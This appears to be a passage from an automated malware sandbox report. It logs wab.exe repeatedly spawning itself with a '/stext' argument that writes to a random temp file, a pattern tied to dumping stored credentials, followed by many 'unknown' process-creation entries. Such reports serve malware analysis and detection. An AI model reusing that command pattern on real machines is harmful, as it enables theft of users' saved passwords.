              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
